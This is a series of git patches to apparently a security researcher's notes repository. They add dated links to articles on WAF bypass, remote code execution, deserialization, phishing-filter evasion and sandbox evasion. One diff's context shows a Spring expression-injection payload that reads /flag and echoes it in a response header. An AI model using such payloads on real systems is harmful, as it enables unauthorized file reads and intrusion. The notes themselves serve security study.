[【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** ++ 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** From 1edd6659cf14d966231c3df6fec6cb88ad485dd9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 5 Mar 2023 19:17:10 +0800 Subject: [PATCH 292/332] Update Readme.md --- shell/SPEL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 82b8808..e989f3e 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md 
@@ -113,6 +113,8 @@ print(')}') 其他bypass: https://xz.aliyun.com/t/9245 +https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/ + ## springboot回显 ``` Java.type("org.springframework.web.context.request.RequestContextHolder").currentRequestAttributes().getResponse().addHeader("test",new java.lang.String(Java.type("sun.misc.IOUtils").readFully(new java.io.FileInputStream("/flag"),1024,false))); From ee15da5ce535972548f4b2621fd8046414925caa Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 5 Mar 2023 19:18:28 +0800 Subject: [PATCH 293/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 93ff134..af19bb5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -285,4 +285,4 @@ + 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** -+ 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** ++ 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) From f27ab7aa58e9fe5a51fa6a996a7dc7489179428e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 7 Mar 2023 13:41:19 +0800 Subject: [PATCH 294/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index af19bb5..e25be21 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -286,3 +286,4 @@ + 2023/03/02 [加密SOCKS5信道中防DNS泄露](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247486522&idx=1&sn=b438259298ecc59b9798dc689143d537&chksm=fab2cf05cdc546135f1347b2138b7d9d5332e30be4f6e059228f15f690a909aff83abf1d03ac&mpshare=1&scene=23&srcid=0228Kxs8UTPwmU6zhqNTsXVQ&sharer_sharetime=1677551815058&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** + 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) ++ 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) From 7c826d0ce4ef148e0ff87af5e6a2557df40e46fe Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 8 Mar 2023 17:06:56 +0800 Subject: [PATCH 295/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e25be21..43b12c0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -287,3 +287,4 @@ + 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** + 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) + 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) ++ 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce From f522f8d08343b78113d6eba260a4cdd8285b148d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 11 Mar 2023 15:27:52 +0800 Subject: [PATCH 296/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 43b12c0..cc935fb 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -288,3 +288,4 @@ + 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) + 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) + 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce ++ 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) From 6a53275e3d9f210d69ba80eec2d8f41856d79dee Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 11 Mar 2023 21:26:49 +0800 Subject: [PATCH 297/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index cc935fb..9c448bc 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -289,3 +289,4 @@ + 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) + 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce + 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) ++ 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** 
From a27e7a5591ab749e9162871f86836366aae41ede Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 11 Mar 2023 23:55:29 +0800 Subject: [PATCH 298/332] Update Readme.md --- Jetty/Readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Jetty/Readme.md b/Jetty/Readme.md index c036d30..5d7c237 100644 --- a/Jetty/Readme.md +++ b/Jetty/Readme.md @@ -2,4 +2,4 @@ 好文章: -https://swarm.ptsecurity.com/tag/web-application-security/ +https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/ From 76f698fba4673f0994ce12893e07ecd9d32565c1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Mar 2023 18:50:02 +0800 Subject: [PATCH 299/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9c448bc..9e15d67 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -290,3 +290,4 @@ + 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce + 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) + 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** ++ 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** From 02d456e5f11c485967dd31b5301e12d19a26766d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Mar 2023 19:09:17 +0800 Subject: [PATCH 300/332] Update Readme.md --- Jetty/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Jetty/Readme.md b/Jetty/Readme.md index 5d7c237..5405b5c 100644 --- a/Jetty/Readme.md +++ b/Jetty/Readme.md @@ -3,3 +3,5 @@ 好文章: https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/ + +https://xz.aliyun.com/t/10039 From 3f9c672c1d196f3f2f511be00585af28fc660134 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Mar 2023 22:59:08 +0800 Subject: [PATCH 301/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9e15d67..65c6fc7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -291,3 +291,4 @@ + 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) + 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** + 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** ++ 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** From 8ea03eebe5c5fe80c327f099b15fa780f054640a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 13 Mar 2023 18:12:18 +0800 Subject: [PATCH 302/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 65c6fc7..e11e728 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -292,3 +292,4 @@ + 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** + 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** + 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** ++ 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** From fe7f2867c318b254903e4b6be87a08b85339c787 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 14 Mar 2023 10:33:17 +0800 Subject: [PATCH 303/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e11e728..46272cd 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -293,3 +293,4 @@ + 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** + 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** + 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** ++ 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 26ee70fed9e9fbe051a6a85cbe68e70864e4be8f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 15 Mar 2023 14:43:24 +0800 Subject: [PATCH 304/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 46272cd..1e58f49 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -294,3 +294,4 @@ + 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** + 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** + 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) From ab0ce4738def82270edfe486823fa1b7c32e18f5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 17 Mar 2023 12:11:19 +0800 Subject: [PATCH 305/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1e58f49..b0f69b6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -295,3 +295,4 @@ + 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** + 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) ++ 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** From 48d65e312141dca3421ec78d72f5d2fb56964f3d Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 17 Mar 2023 12:15:35 +0800 Subject: [PATCH 306/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b0f69b6..1c76aa4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -296,3 +296,4 @@ + 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) + 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** ++ 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) From c5e3fd5a005c6f7030be432f06c93deca0810798 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 19 Mar 2023 21:11:47 +0800 Subject: [PATCH 307/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1c76aa4..898ef28 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -297,3 +297,4 @@ + 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) + 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** + 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) ++ 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) From 0d43bc7ef57d10776b06583692dbba4093953358 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 23 Mar 2023 21:11:49 +0800 Subject: [PATCH 308/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 898ef28..ee3471a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -298,3 +298,4 @@ + 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** + 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) + 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) ++ 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 From c291cec664f149a2fb45451db3d479f000046eb5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Mar 2023 12:45:48 +0800 Subject: [PATCH 309/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ee3471a..7781424 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -299,3 +299,4 @@ + 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) + 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) + 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 ++ 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** From 24304a9f545ebf842434f36cacb1220c48c18fea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 26 Mar 2023 23:25:59 +0800 Subject: [PATCH 310/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7781424..bfe30ae 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -300,3 +300,4 @@ + 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) + 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 + 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** ++ 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** 
